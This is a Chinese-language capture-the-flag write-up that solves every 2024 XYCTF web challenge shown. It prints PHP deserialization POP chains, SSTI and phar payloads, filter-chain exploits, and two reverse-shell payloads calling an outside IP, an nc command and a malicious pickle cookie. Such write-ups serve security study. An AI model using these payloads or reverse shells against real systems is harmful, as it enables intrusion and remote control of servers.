前端开发-2024 XYCTF Web 方向 wp 全解 - Powered by Discuz! Archiver

乌市泽哥 发表于 2024-7-12 14:25:59

2024 XYCTF Web 方向 wp 全解

2024 XYCTF Web 方向全解

Web

ezhttp

考点:信息泄漏+底子发包

https://img-blog.csdnimg.cn/img_convert/1ad404be985746f85e386a9ce652d92f.png
访问 /robots.txt
https://img-blog.csdnimg.cn/img_convert/055a4df9597aa714924292b303006540.png
访问 /l0g1n.txt
https://img-blog.csdnimg.cn/img_convert/860fa6083dc3a8bbd6ef6c77a0a46ed0.png
username: XYCTF
password: @JOILha!wuigqi123$
登录
https://img-blog.csdnimg.cn/img_convert/fe645e83b94227bc82181de018f70e18.png
添加Referer头
https://img-blog.csdnimg.cn/img_convert/3524b84d04e25c112302e1952797d097.png
https://img-blog.csdnimg.cn/img_convert/e31471d51d6c63465df7e94ed50193dc.png
添加User-Agent
https://img-blog.csdnimg.cn/img_convert/2479df8232013908fd0d74b4f0934fcd.png
https://img-blog.csdnimg.cn/img_convert/339b50b86593d24cce8271a390ec3b10.png
直接burp(fake ip)插件一把梭
https://img-blog.csdnimg.cn/img_convert/75abb4bf791a4c677a55a7b29beee057.png
添加 Via头
https://img-blog.csdnimg.cn/img_convert/878d797a1b0e3995e36b82a737c8ff9c.png
添加 Cookie
https://img-blog.csdnimg.cn/img_convert/10fe5030c854a287ff74482744834eee.png
可以拿flag
warm up

考点:php黑邪术+变量覆盖

<?php
include 'next.php';
highlight_file(__FILE__);
$XYCTF = "Warm up";
extract($_GET);

if (isset($_GET['val1']) && isset($_GET['val2']) && $_GET['val1'] != $_GET['val2'] && md5($_GET['val1']) == md5($_GET['val2'])) {
echo "ez" . " ";
} else {
die("什么情况,这么基础的md5做不来");
}

if (isset($md5) && $md5 == md5($md5)) {
echo "ezez" . " ";
} else {
die("什么情况,这么基础的md5做不来");
}

if ($XY == $XYCTF) {
if ($XY != "XYCTF_550102591" && md5($XY) == md5("XYCTF_550102591")) {
 echo $level2;
} else {
 die("什么情况,这么基础的md5做不来");
}
} else {
die("学这么久,传参不会传?");
}
extract是典型的变量覆盖关键字
1.md5弱范例，数组绕过即可
$_GET['val1'] != $_GET['val2'] && md5($_GET['val1']) == md5($_GET['val2']
2.随便在网上找个md5结果为0e开头字符串而且本身是0e开头的
0e215962017 --------->md5(0e215962017)=0e291242476940776845150308577824
$md5 == md5($md5)
比如:0e123==0e321
3.$XY == $XYCTF变量覆盖直接串$XY和$XYCTF即可
4.0e绕过md5弱相称
$XY != "XYCTF_550102591" && md5($XY) == md5("XYCTF_550102591"))
https://img-blog.csdnimg.cn/img_convert/a436884510e686ba6916643612f8f0ff.png
可以沿用0e215962017的结果
https://img-blog.csdnimg.cn/img_convert/b1c1fbe35e06aec551dcadb7526a8a47.png
进入 LLeeevvveeelll222.php
<?php
highlight_file(__FILE__);
if (isset($_POST['a']) && !preg_match('//', $_POST['a']) && intval($_POST['a'])) {
echo "操作你O.o";
echo preg_replace($_GET['a'],$_GET['b'],$_GET['c']);// 我可不会像别人一样设置10来个level
} else {
die("有点汗流浃背");
}
注意当前php版本较低
https://img-blog.csdnimg.cn/img_convert/e5b50597b30826124cac14541270cd93.png
典型的preg_replace命令实行
!preg_match('//', $_POST['a']) && intval($_POST['a']
intval 数组绕过即可
https://img-blog.csdnimg.cn/img_convert/d9ae3e8f5e8a5bdef8248b6f60b6419a.png
preg_replace()+/e实行任意命令
https://img-blog.csdnimg.cn/img_convert/76a6b55d6aeaf1ffc7860a567d979a28.png
可以成功拿到flag
https://img-blog.csdnimg.cn/img_convert/87248a09dcb0d38c0d04a8daa2e5d89e.png
ezRCE

考点:无字母RCE(bashfuck)+shell变量构造RCE

<?php
highlight_file(__FILE__);
function waf($cmd){ $white_list = ['0','1','2','3','4','5','6','7','8','9','\\','\'','$','<']; $cmd_char = str_split($cmd);
foreach($cmd_char as $char){
 if (!in_array($char, $white_list)){
 die("really ez?");
 }
}
return $cmd;
}
$cmd=waf($_GET["cmd"]);
system($cmd);
快速使用可以用探姬的项目bashFuck
例如 ls
https://img-blog.csdnimg.cn/img_convert/c0c5dc56b56240406b99702dcf971d7e.png
可以成功实行结果
https://img-blog.csdnimg.cn/img_convert/f830dfd6eea47ecd939db2adaadb8809.png
我们可以实验{ls,/}
https://img-blog.csdnimg.cn/img_convert/872e721e5c585836dedf210039131492.png
https://img-blog.csdnimg.cn/img_convert/8d5828dc09a1799b62ca05cb6f7159c0.png
此时的payload会发现是无效的,思考这是为什么?
缘故原由是 $'\173\154\163\54\57\175' 被shell解析后当作了字符 {ls,/}而不是命令，没有任何意义
现在题目转换成如何正确表示空格和命令
发现一篇文章使用shell脚本变量构造无字母数字命令
文中就是答案
https://img-blog.csdnimg.cn/img_convert/d0defb15c794211ea1ddc2f0a876ba20.png
通过bash<<<{cat,/f*}将命令两次管道解析保证命令可以直接实行
bash$'\142\141\163\150'
{cat,/f*} $'\173\143\141\164\54\57\146\52\175'
$'\142\141\163\150'<<<$'\173\143\141\164\54\57\146\52\175'
第一次,解析shell为bash<<{cat,/f*}
第二次,将{cat,/f*}通报给bash正确解析
https://img-blog.csdnimg.cn/img_convert/f6c6025a36d606c0673b96c7c56421bc.png
可以得到flag
ezmd5

考点:md5文件强相称

https://img-blog.csdnimg.cn/img_convert/3e344070312a46e8d837084fac187233.png
用工具fastcoll强碰撞
https://img-blog.csdnimg.cn/img_convert/5e2cee3bf05bfabdd809807a6db43a48.png
上传1.jpg和2.jpg即可
https://img-blog.csdnimg.cn/img_convert/7d948c0938361eb8c8aef38a5abc2145.png
ezunserilze

考点：引用绕过强相称+php原生类读文件

<?php
include 'flag.php';
highlight_file(__FILE__);
error_reporting(0);

class Flag {
public $token;
public $password;

public function __construct($a, $b)
{ $this->token = $a; $this->password = $b;
}

public function login()
{
 return $this->token === $this->password;
}
}

if (isset($_GET['pop']))
{
$pop = unserialize($_GET['pop']);
$pop->token=md5(mt_rand());
if($pop->login()) {
 echo $flag;
}
}
第一段:引用绕过强相称
payload:
<?php
class Flag { public $token; public $password;
 public function __construct()
 {
 $this->password = &$this->token;
 }
 }
 $flag = new Flag();
 echo serialize($flag);
?>
https://img-blog.csdnimg.cn/img_convert/ea17aa00952ccff9f88db12fd8cea7a6.png
访问 fpclosefpclosefpcloseffflllaaaggg.php
第二段:PHP反序列化可控任意属性
<?php
highlight_file(__FILE__);
class A {
public $mack;
public function __invoke()
{
 $this->mack->nonExistentMethod();
}
}

class B {
public $luo;
public function __get($key){
 echo "o.O ";
 $function = $this->luo;
 return $function();
}
}

class C {
public $wang1;

public function __call($wang1,$wang2)
{
 include 'flag.php';
 echo $flag2;
}
}

class D {
public $lao;
public $chen;
public function __toString(){
 echo "O.o ";
 return is_null($this->lao->chen) ? "" : $this->lao->chen;
}
}

class E {
public $name = "xxxxx";
public $num;

public function __unserialize($data)
{
 echo " 学到就是赚到! ";
 echo $data['num'];
}
public function __wakeup(){
 if($this->name!='' || $this->num!=''){
 echo "旅行者别忘记旅行的意义! ";
 }
}
}

if (isset($_POST['pop'])) {
unserialize($_POST['pop']);
}
编写Poc
<?php
class A {
public $mack;

}

class B {
public $luo;

}

class C {
public $wang1;

}

class D {
public $lao;
public $chen;

}

class E {
public $name = "xxxxx";
public $num;

}
$e=new E();
$e->name=new D();
$e->name->lao=new B();
$e->name->lao->luo=new A();
$e->name->lao->luo->mack=new C();
echo(serialize($e));
https://img-blog.csdnimg.cn/img_convert/39e1537a59e837dd736602bc52c7a8c3.png
访问saber_master_saber_master.php
<?php

error_reporting(0);
highlight_file(__FILE__);

// flag.php
class XYCTFNO1
{
public $Liu;
public $T1ng;
private $upsw1ng;

public function __construct($Liu, $T1ng, $upsw1ng = Showmaker)
{
 $this->Liu = $Liu;
 $this->T1ng = $T1ng;
 $this->upsw1ng = $upsw1ng;
}
}

class XYCTFNO2
{
public $crypto0;
public $adwa;

public function __construct($crypto0, $adwa)
{
 $this->crypto0 = $crypto0;
}

public function XYCTF()
{
 if ($this->adwa->crypto0 != 'dev1l' or $this->adwa->T1ng != 'yuroandCMD258') {
 return False;
 } else {
 return True;
 }
}
}

class XYCTFNO3
{
public $KickyMu;
public $fpclose;
public $N1ght = "Crypto0";

public function __construct($KickyMu, $fpclose)
{
 $this->KickyMu = $KickyMu;
 $this->fpclose = $fpclose;
}

public function XY()
{
 if ($this->N1ght == 'oSthing') {
 echo "WOW, You web is really good!!!\n";
 echo new $_POST['X']($_POST['Y']);
 }
}

public function __wakeup()
{
 if ($this->KickyMu->XYCTF()) {
 $this->XY();
 }
}
}

if (isset($_GET['CTF'])) {
unserialize($_GET['CTF']);
}
POC:
<?php

// flag.php
class XYCTFNO1
{
public $Liu;
public $T1ng;
public $upsw1ng;

}

class XYCTFNO2
{
public $crypto0;
public $adwa;

}

class XYCTFNO3
{
public $KickyMu;
public $fpclose;
public $N1ght = "Crypto0";

}

$xyctf3=new XYCTFNO3();
$xyctf3->N1ght='oSthing';
$xyctf3->KickyMu=new XYCTFNO2();
$xyctf3->KickyMu->adwa=new XYCTFNO1();
$xyctf3->KickyMu->adwa->crypto0='dev1l';
$xyctf3->KickyMu->adwa->T1ng='yuroandCMD258';
echo(serialize($xyctf3));
https://img-blog.csdnimg.cn/img_convert/9e290788b1657fdc995dfe3a924b5774.png
终极命令实行触发点
echo new $_POST['X']($_POST['Y']);
php原生类读文件 SplFileObject(默认读一行)
以是要结合php伪协议读文件全部内容
X=SplFileObject&Y=php://filter/convert.base64-encode/resource=flag.php
https://img-blog.csdnimg.cn/img_convert/aff5e48603d94357ecd72c2bb1f9f555.png
解码就是flag
https://img-blog.csdnimg.cn/img_convert/69977ae9c74461a625a3f8688cca78b7.png
牢牢记取，逝者为大

考点：php代码实行过滤绕过

<?php
highlight_file(__FILE__);
function Kobe($cmd)
{
if (strlen($cmd) > 13) {
 die("see you again~");
}
if (preg_match("/echo|exec|eval|system|fputs|\.|\/|\\|/i", $cmd)) {
 die("肘死你");
}
foreach ($_GET as $val_name => $val_val) {
 if (preg_match("/bin|mv|cp|ls|\||f|a|l|\?|\*|\>/i", $val_val)) {
 return "what can i say";
 }
}
return $cmd;
}

$cmd = Kobe($_GET['cmd']);
echo "#man," . $cmd. ",manba out";
echo " ";
eval("#man," . $cmd . ",mamba out");
有长度限制strlen($cmd) > 13
考虑反引号实行系统命令(只有两个字符) 等价于 `shell_exec(); 这个命令是没有回显的
做个转讨论逃逸命令长度限制
`$_GET`;
将实行 GET参数中1的值
过滤后终极实行eval("#man," . $cmd . ",mamba out");有无关字符
# 在php中是单行注释符用 %0A换行即可绕过（到下一行了）
. ",mamba out" 后面有无关字符用#注释后面即可
payload: 刚好13个字符
cmd=%0a`$_GET`;
%23 没有回显考虑反弹shell
payload
?cmd=%0a`$_GET`;
%23&1=nc 148.135.82.190 8888 -e /bi''n/sh 可以成功用nc反弹shell
https://img-blog.csdnimg.cn/img_convert/a5b48c08b1d86a1d7c0d6872d073f575.png
ezMake

考点:命令实行绕过+shell变量更换符读文件 trick

清空默认情况变量，但是发现echo可用
法一：使用shell变量更换符$(<file)读文件
看看可以如何用
https://img-blog.csdnimg.cn/img_convert/0b9692136819a51b5e8f4faba3f2833b.png
坑点:这里两个$$才代表一个$注意一下
echo $$(<flag)
直接读flag
https://img-blog.csdnimg.cn/img_convert/3873d3269bc3a2d486c27fac6c070aec.png
报错带出也是可以的
https://img-blog.csdnimg.cn/img_convert/e3467ee12c344932929a260504124cae.png
法二:直接访问/flag在当前目次下，直接下载下来即可
010打开后
https://img-blog.csdnimg.cn/img_convert/81ef638e4fef6e8dee0a8e457b458831.png
直接就是flag
ez?Make

考点:读文件+文件名过滤

flag在根目次下
https://img-blog.csdnimg.cn/img_convert/552d3e405ba2516d75e24cef2eb0ccf0.png
cd到根目次下
https://img-blog.csdnimg.cn/img_convert/304c393a59c73e4bc2d7189e651a6eaf.png
通过shell正则匹配到flag文件,用more读取(大概禁了f,l,a,g ,/字符)
https://img-blog.csdnimg.cn/img_convert/b8709ed5770b5a4a3042c7e1bc6c4f4c.png
[^b]代表不是b的其他字符
εZ?¿м@Kε¿?

考点:报错读文件+makefile自动变量

Makefile 自动变量
在Makefile中，各人经常会见到类似 @ 、 @、 @、^、$<这种范例的变量。这种变量一般称为自动变量，自动变量是局部变量，作用域范围在当前的规则内，它们分别代表不同的寄义：

[*]$@：目的
[*]$^：所有目的依靠
[*]$<：目的依靠列表中的第一个依靠
[*] ? ：所有目的依靠中被修改过的文件这里第一个依靠是就是 / f l a g ( 注意 = = 坑点 = = ，之前不要试 ?：所有目的依靠中被修改过的文件这里第一个依靠是就是 /flag (注意==坑点==，之前不要试 ?：所有目的依靠中被修改过的文件这里第一个依靠是就是/flag(注意==坑点==，之前不要试>，会导致重定向输出创建新文件了，直接影响了后续判断为依靠是FLAG,卡了半天读不到/flag)
https://img-blog.csdnimg.cn/img_convert/038544a99ffbe30d2428f88f22c14122.png
配和报错带出即可参照前面ezMake
坑点:这里两个$$才代表一个$
$$(<$<)
https://img-blog.csdnimg.cn/img_convert/883a381995a53463d321ad6f0959c283.png
我是一个复读机

考点:弱密码+SSTI的简单绕过(requests)

账号admin 密码asdqwe
构造错误数据登录包
https://img-blog.csdnimg.cn/img_convert/c57b1a62e06845f556cc5a4ddbbb3bbb.png
直接将题目考点暴露出来肯定是SSTI
简单Fuzz一下
https://img-blog.csdnimg.cn/img_convert/4baa0514e3c7913fd6a9ad0287eabbdf.png
发现标签都闭合不了{{}},{%%}
思考是不是代表不能做?
测了一下中文全角（任意全角字符）都可以返回正常的{}(有点脑洞)
https://img-blog.csdnimg.cn/img_convert/af2036601b2a3a5e66158045ec4e33b5.png
https://img-blog.csdnimg.cn/img_convert/c9dc372b9152255deb77c3203284ff86.png
requests,args,.没有克制
直接requests绕过关键词过滤|attr()绕过[]过滤
[[lipsum|attr(request.args.glo)|attr(request.args.ge)(request.args.o)|attr(request.args.po)(request.args.cmd)|attr(request.args.re)()&glo=__globals__&ge=__getitem__&o=os&po=popen&cmd=cat /flag&re=read
https://img-blog.csdnimg.cn/img_convert/574ab425ebe3c87b203eccacca01531b.png
直接读flag
Pharme

考点：文件上传+phar文件包含+无参代码实行RCE+__halt_compiler函数的应用

先创建phar文件
<?php

class evil{
public $cmd;
public $a;

}

@unlink('test.phar'); //删除之前的test.par文件(如果有)
$phar=new Phar('test.phar');//创建一个phar对象，文件名必须以phar为后缀
$phar->startBuffering();//开始写文件
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');//写入stub
$o=new evil();
$o->cmd='print_r(getallheaders());eval(reset(getallheaders()));__halt_compiler();';
$phar->setMetadata($o);//写入meta-data
$phar->addFromString("test.txt","test");//添加要压缩的文件
$phar->stopBuffering();
?>

得到test.phar文件
https://img-blog.csdnimg.cn/img_convert/20e8dd75940aa12f9cbc2fcb9b9053d0.png
上传phar文件
https://img-blog.csdnimg.cn/img_convert/b3e67e1c8048e1f87f1d9f1bbd12baeb.png
文件上传存在典型检测__HALT_COMPILER被过滤了将天生的Phar文件举行gzip压缩绕过即可
gzip压缩后，修改后缀为jpg
https://img-blog.csdnimg.cn/img_convert/39e2358c02dd0ec47e8c38c243875055.png
成功上传
拿文件上传地点
/tmp/0412c29576c708cf0155e8de242169b1.jpg
https://img-blog.csdnimg.cn/img_convert/6834692e26db45fd8849a73360eb27f8.png
访问class.php内容
<?php
error_reporting(0);
highlight_file(__FILE__);
class evil{
public $cmd;
public $a;
public function __destruct(){
 if('ch3nx1' === preg_replace('/;+/','ch3nx1',preg_replace('/+/','',$this->cmd))){
 eval($this->cmd.'isbigvegetablechicken!');
 } else {
 echo 'nonono';
 }
}
}

if(isset($_POST['file']))
{
if(preg_match('/^phar:\/\//i',$_POST['file']))
{
 die("nonono");
}
file_get_contents($_POST['file']);
}
关键点1.if('ch3nx1' === preg_replace('/;+/','ch3nx1',preg_replace('/+/','',$this->cmd)))
将A-Z,a-z,_,(,)更换为空后将留下的;更换为ch3nx1后查抄是否是等于ch3nx1
简单来说就是典型的无参代码实行RCE
用常见的绕过手法即可
关键点2.preg_match('/^phar:\/\//i 开头不能是phar://
直接php://filtr/resource=phar://绕过即可
关键点3. eval($this->cmd.'isbigvegetablechicken!');
我们的题目是：如何正常实行前面内容而忽视后面的编译错误
通过使用__halt_compiler 函数停止编译器的实行可以达成这个结果
https://img-blog.csdnimg.cn/img_convert/eba9183f7307ba4c09a29660e90e8913.png
https://img-blog.csdnimg.cn/img_convert/68d3da14aa1ca1c9234b70488e55f6d0.png
等价实行了print_r(getallheaders());eval(reset(getallheaders()));__halt_compiler();
eval()实行host之前的请求头
https://img-blog.csdnimg.cn/img_convert/9acff4a3aea7c4171d379e38647fb8fc.png
直接可以得到flag
题目溯源:

[*] 安洵杯SYCCTF2023 4号的罗纳尔多 POC根本一模一样https://img-blog.csdnimg.cn/img_convert/745e0978de7fbb57275ff53b4c30cb72.png
[*] 2022 极客大挑战 ezRCE
连连看到底是连连什么看

考点:php filter chain构造指定字符串

精良的Github项目:
1.php_filter_chain_generator
https://github.com/synacktiv/php_filter_chain_generator
2.PHP_INCLUDE_TO_SHELL_CHAR_DICT:（提供了Fuzz脚本）
https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
注意：以上项目只实现了构造目的字符串，字符集存在乱码，如果要构造明确的字符，需要了解构造php filter chain构造根本原理
https://img-blog.csdnimg.cn/img_convert/d8a9611d8ceed6adbea76e9a08851e2b.png
保证php filter chain天生内容是XYCTF就可以得到flag
这里我们用php_filter_chain_generator辅助分析
https://img-blog.csdnimg.cn/img_convert/7054b9d02c40ba835d9aa5dba434b53c.png
先在本地测试调试输出
https://img-blog.csdnimg.cn/img_convert/7088c2eb52ced6b490ef5789f6c0a2c4.png
可以构造出XYCTF+一堆乱码
现在的题目是如何去掉这堆乱码
法一:
最简解配合 string.strip_tags过滤器剔除垃圾字符
可以去掉php,html标签内容，<我是垃圾>乃至可以是没有闭合的标签<垃圾是我后的所有字符
https://img-blog.csdnimg.cn/img_convert/a913ee7c6062df0d0cf70adebc31b132.png
(这里固然说是php7.3.0后废除，但是我看了看网上在线的php官方文档直到php8.0还没有完全废弃)
以是也是可以用的,嘿嘿
我们构造XYCTF<
https://img-blog.csdnimg.cn/img_convert/ef9b681b1c36bfaa298473f77c6c3a86.png
https://img-blog.csdnimg.cn/img_convert/cc0f48f00f57cf3cfb61bc6c83a15ebd.png
手动添加string.strip_tags
直接剔除<后面的垃圾字符，输出flag
https://img-blog.csdnimg.cn/img_convert/311c042c74fc8f8e80501d8a7efe6596.png
POC
convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode|string.strip_tags
https://img-blog.csdnimg.cn/img_convert/860de6a89894f907613a03387050a253.png
远程一样买通
法二:
手搓字符（使用base-decode去除非码表字符特性）
编码时遵循3变4原则，缺就用=补位
简单测试一下
https://img-blog.csdnimg.cn/img_convert/696a290554cb9d3020d370c59a0b47a0.png
先解码后编码 -----> 可以看到后面的非码表字符被剔除了
不能正常解码可以手动填充数据（用码表字符补）直到乱码中没有码表字符,也别带=号(填充无关紧急，但是多次解码后会影响结果) 接下来不断解码编码
https://img-blog.csdnimg.cn/img_convert/fc0dcb19d23e01c44ba4afe1ad58e0f0.png
https://img-blog.csdnimg.cn/img_convert/a3c0266a7dfcdf2cd3d4a53e51092a74.png
手动构造出字符VmpCYWMxSkdXa1pYVVdGRFEwUWUar base64-decode 4次可以剔除垃圾字符构造出XYCTF
https://img-blog.csdnimg.cn/img_convert/3b971b1cc4daae9b4b3d4df827a59138.png
手动加 base64-decode 4次即可
https://img-blog.csdnimg.cn/img_convert/8cea8245529d7b17e3b22cf89a039f18.png
照旧挺神奇的,不过不保举，容易出错
法三:
poc脚本修改
队友给了个脚本,因为 =是工具作者没有Fuzzing出来的
以是在直接在去掉=填充也不影响数据
import base64

file_to_use = "/etc/passwd"

#<?php eval($_GET);?>a
base64_payload=base64.b64encode("Vm1wQ1lXTXhTa2RYYTFwWVZWRQ".encode()).decode().replace("=","")
print(base64_payload)
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"

for c in base64_payload[::-1]:
 filters += open('./res/'+(str(hex(ord(c)))).replace("0x","")).read() + "|"
 # decode and reencode to get rid of everything that isn't valid base64
 filters += "convert.base64-decode|"
 filters += "convert.base64-encode|"
 # get rid of equal signs
 filters += "convert.iconv.UTF8.UTF7|"

filters += "convert.base64-decode"

final_payload = f"php://filter/{filters}/resource={file_to_use}"

with open('test.php','w') as f:
f.write('<?php echo file_get_contents("'+final_payload+'");?>')
print(filters)
解base64-decode 7次可以拿到XYCTF
ezpop

考点:Fast-destruct+call_user_func闭包RCE

<?php
error_reporting(0);
highlight_file(__FILE__);

class AAA
{
public $s;
public $a;
public function __toString()
{
 echo "you get 2 A ";
 $p = $this->a;
 return $this->s->$p;
}
}

class BBB
{
public $c;
public $d;
public function __get($name)
{
 echo "you get 2 B ";
 $a=$_POST['a'];
 $b=$_POST;
 $c=$this->c;
 $d=$this->d;
 if (isset($b['a'])) {
 unset($b['a']);
 } call_user_func($a,$b)($c)($d);
}
}

class CCC
{
public $c;

public function __destruct()
{
 echo "you get 2 C ";
 echo $this->c;
}
}

if(isset($_GET['xy'])) { $a = unserialize($_GET['xy']);
throw new Exception("noooooob!!!");
}
关键点1.绕过throw new Exception("noooooob!!!");
Fast-destruct即可:删除末尾的} 快速触发__destruct() (垃圾接纳机制)从而绕过抛出异常终止实行
关键点2.call_user_func($a,$b)($c)($d);
$b是$_POST的数组（去除了a)
等价于call_user_func($a,['key'=>'value'])($c)($d);
call_user_func用法
https://img-blog.csdnimg.cn/img_convert/d7a5f6e8d0f9e3090bc7ca1af90978b2.png
思考我们PHP命令实行的几种形式,我们要如何将它联系在一起来了?
在PHP>7后，支持('system')('ls')这种动态实行函数的特性
简单测测任意闭包会影响结果吗?
https://img-blog.csdnimg.cn/img_convert/959440d7140e00b0ec629aeae06e4635.png
('system')('ls')('J1rrY')(668)(996);任意闭包都不会影响我们的结果
那么我们现在的题目是如何让call_user_func($a,['key'=>'value'])返回字符串而且回调函数接受一个数组，我们自然而然想到implode函数，将数组的值拼接为一个字符串，非常符合我们的预期
简单测试一下
https://img-blog.csdnimg.cn/img_convert/50fb0f011b1c65a69fc8e0adf41bb02c.png
可以成功实行我们的系统命令，至此整条链子也通了
编写简单的POP链
<?php
error_reporting(0);
class AAA
{
public $s;
public $a;
}
class BBB
{
public $c;
public $d;

}

class CCC
{
public $c;
}
$c=new CCC();
$c->c=new AAA();
$c->c->s=new BBB();
$c->c->a="test";
$c->c->s->c='cat /f*';
$c->c->s->d=0;
echo(serialize($c));
天生后删除末尾 }
payload:
O:3:"CCC":1:{s:1:"c";O:3:"AAA":2:{s:1:"s";O:3:"BBB":2:{s:1:"c";s:7:"cat /f*";s:1:"d";i:0;}s:1:"a";s:4:"test";}
https://img-blog.csdnimg.cn/img_convert/149cf87f87d56c1c0d61f5010099b70d.png
直接读到flag
题目溯源:
1.Lctf 2018 bestphp’s revenge
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
$_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>
ezClass

考点：php原生类构造字符串+php动态实行函数特性

<?php
highlight_file(__FILE__);
$a=$_GET['a'];
$aa=$_GET['aa'];
$b=$_GET['b'];
$bb=$_GET['bb'];
$c=$_GET['c'];
((new $a($aa))->$c())((new $b($bb))->$c());
布局 new 一个类(参数)->实行方法
使用Error类的静态方法 getMessage返回任意字符结合php的动态实行特性
https://img-blog.csdnimg.cn/img_convert/8c812c10cde7a93cc256157fc9983494.png
例如new Error("system")->getMessage 会返回system
https://img-blog.csdnimg.cn/img_convert/9523a1cf5e223c7f7a4811ab22068f40.png
POC
?a=Error&aa=system&b=Error&bb=cat /f*&c=getMessage
https://img-blog.csdnimg.cn/img_convert/ae153f234761a6eb083997fb5047f7bd.png
login

考点:pickle反序列化字节码绕过(opache绕过)

https://img-blog.csdnimg.cn/img_convert/b16883dcfac168e326e7ddab286509f3.png
看后缀大概以为是php做后端，但是服务器的响应式flask的框架(fake php)
经典注册登录 /register.php
注册一个账号 1,1 登录成功后检察 cookie
https://img-blog.csdnimg.cn/img_convert/1f0caa1186046ba1f672b07c34900851.png
猜疑RememberMe的字段是 pickle反序列化后的数据
写个脚本反序列化一下
import pickle

import base64

import pickletools

cookie="gASVLAAAAAAAAACMA2FwcJSMBUxvZ2lulJOUKYGUfZQojARuYW1llIwBMZSMA3B3ZJRoBnViLg=="

data=base64.b64decode(cookie)

print(pickletools.dis(data))
https://img-blog.csdnimg.cn/img_convert/a09e992aa9f2ea54857e55349c30f87c.png
确定是 pickle反序列化的题目
简单Fuzz发现是过滤 R,r字符
考虑 opache绕过比如 i 方向之前写过文章总结过这里不重复了
当时笔记是
[!NOTE]
可以直接拼接pickle数据（不用伪造flask-session的题）
直接将base64-decode数据末了的.去掉后贴payload直接打反弹shell
\x80\x04\x95,\x00\x00\x00\x00\x00\x00\x00\x8c\x03app\x94\x8c\x05Login\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c\x011\x94\x8c\x03pwd\x94h\x06ub.
.代表结束可以将两个pickle流直接拼接在一起
i可用
b'''(S'whoami'\nios\nsystem\n.'''
拼接一下
\x80\x04\x95,\x00\x00\x00\x00\x00\x00\x00\x8c\x03app\x94\x8c\x05Login\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c\x011\x94\x8c\x03pwd\x94h\x06ub(S'bash -c "bash -i >& /dev/tcp/148.135.82.190/8888 0>&1"'\nios\nsystem\n.
import pickle

import base64

import pickletools

cookie="gASVLAAAAAAAAACMA2FwcJSMBUxvZ2lulJOUKYGUfZQojARuYW1llIwBMZSMA3B3ZJRoBnViLg=="

print(base64.b64decode(cookie))

import base64

#bash -c "bash -i >& /dev/tcp/148.135.82.190/8888 0>&1"

opcode=b'''\x80\x04\x95,\x00\x00\x00\x00\x00\x00\x00\x8c\x03app\x94\x8c\x05Login\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c\x011\x94\x8c\x03pwd\x94h\x06ub(S'bash -c "bash -i >& /dev/tcp/148.135.82.190/8888 0>&1"'\nios\nsystem\n.'''

print(base64.b64encode(opcode))
对数据base64编码后
gASVLAAAAAAAAACMA2FwcJSMBUxvZ2lulJOUKYGUfZQojARuYW1llIwBMZSMA3B3ZJRoBnViKFMnYmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xNDguMTM1LjgyLjE5MC84ODg4IDA+JjEiJwppb3MKc3lzdGVtCi4=
发送请求
https://img-blog.csdnimg.cn/img_convert/7fb956495b45b74498ab43dac276b4d5.png
可以直接反弹shell
https://img-blog.csdnimg.cn/img_convert/46a13f00c7dd019a29300836439b5674.png
https://img-blog.csdnimg.cn/img_convert/054370eb2659c1778785163470c6914d.png
直接拿flag即可
give me flag

考点:hash长度扩展攻击

典型md5长度扩展攻击 md5($FLAG.$value.$time)===$md5
<?php
include('flag.php');
$FLAG_md5 = md5($FLAG);
if(!isset($_GET['md5']) || !isset($_GET['value']))
{ highlight_file(__FILE__);
die($FLAG_md5);
}

$value = $_GET['value'];
$md5 = $_GET['md5'];
$time = time();

if(md5($FLAG.$value.$time)===$md5)
{
echo "yes, give you flag: ";
echo $FLAG;
}
保举中文项目:https://github.com/shellfeel/hash-ext-attack
原先的 hashpump项目作者github删库了
法一：最简解(直接办测)
unxi时间戳
https://img-blog.csdnimg.cn/img_convert/21e6151a0e74485dba0c0fd35d74d835.png
注意unix时间戳发起提前100秒
直接将 md5($FLAG) 的值输出了
https://img-blog.csdnimg.cn/img_convert/232bfae54c4edff8cea0016312da1f47.png
md5($FLAG.$value.$time)===$md5
$timeunix时间做了后缀字符
比如我当时的时间戳是1714025400 那我写后缀是就是 1714025500
